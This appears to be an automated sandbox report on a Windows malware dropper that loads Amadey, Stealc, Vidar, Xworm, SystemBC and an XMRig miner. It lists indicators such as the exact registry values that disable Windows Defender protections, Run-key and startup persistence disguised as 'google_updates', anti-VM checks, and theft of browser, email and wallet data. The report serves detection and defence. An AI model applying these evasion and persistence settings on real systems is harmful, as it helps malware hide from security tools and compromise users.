Malware Analysis Report

2025-04-03 09:31

Sample ID 250305-3kshtssqy3
Target 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288
SHA256 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288
Tags
amadey gcleaner healer litehttp stealc vidar xworm 092155 ir7am trump bot defense_evasion discovery dropper evasion execution loader persistence rat spyware stealer trojan systembc xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288

Threat Level: Known bad

The file 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288 was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer litehttp stealc vidar xworm 092155 ir7am trump bot defense_evasion discovery dropper evasion execution loader persistence rat spyware stealer trojan systembc xmrig miner

Stealc

Detect Xworm Payload

Healer

Stealc family

xmrig

Vidar family

LiteHTTP

GCleaner

Xworm

Modifies Windows Defender DisableAntiSpyware settings

SystemBC

Vidar

Litehttp family

Xmrig family

Detects Healer an antivirus disabler dropper

Gcleaner family

Healer family

Amadey

Xworm family

Systembc family

Detect Vidar Stealer

Amadey family

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender TamperProtection settings

Modifies Windows Defender notification settings

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Identifies Wine through registry keys

Checks BIOS information in registry

Windows security modification

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Reads user/profile data of local email clients

Loads dropped DLL

Drops startup file

.NET Reactor proctector

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Windows directory

Browser Information Discovery

Program crash

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Checks processor information in registry

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 23:34

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 23:34

Reported

2025-03-05 23:37

Platform

win7-20240903-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\jLEaFdlg\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2a6d35a13.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\a2a6d35a13.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a3f26c3fce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\a3f26c3fce.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\b668242231.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\b668242231.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\e16f9098dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107940101\\e16f9098dd.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
